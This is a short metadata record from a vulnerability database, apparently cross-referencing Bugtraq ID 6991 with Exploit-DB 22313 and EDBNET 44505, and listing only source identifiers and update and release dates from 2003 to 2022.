sources: BID: 6991 // EXPLOIT-DB: 22313 // EDBNET: 44505

SOURCES

db:	BID	id:	6991
db:	EXPLOIT-DB	id:	22313
db:	EDBNET	id:	44505

LAST UPDATE DATE

2022-07-27T09:23:53.267000+00:00

SOURCES UPDATE DATE

db:

BID

id:

6991

date:

2007-09-22T00:30:00

SOURCES RELEASE DATE

db:	BID	id:	6991	date:	2003-03-02T00:00:00
db:	EXPLOIT-DB	id:	22313	date:	2003-03-02T00:00:00
db:	EDBNET	id:	44505	date:	2003-03-02T00:00:00